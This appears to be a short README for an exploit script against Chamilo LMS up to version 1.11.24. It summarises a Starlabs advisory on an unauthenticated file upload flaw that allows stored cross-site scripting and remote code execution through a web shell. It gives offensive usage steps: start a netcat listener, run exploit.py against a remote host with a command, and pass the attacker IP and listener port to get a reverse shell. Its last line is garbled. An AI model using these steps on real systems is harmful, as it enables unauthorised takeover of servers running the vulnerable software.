Starlabs advisory
- Affected product: Chamilo <= v1.11.24
- Description: Unrestricted file upload in big file upload functionality in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.
- CVSS Score: 8.1 (High)
- Set up a netcat listener (if you want a reverse shell)
- Run the exploit
python3 exploit.py -u --url <REMOTE HOST>, -p --port [REMOTE PORT] -c --comand <COMMAND>
- Flags for reverse shell
- -lh/--localhost: Attacker IP
- **-lp/--localtcat listener port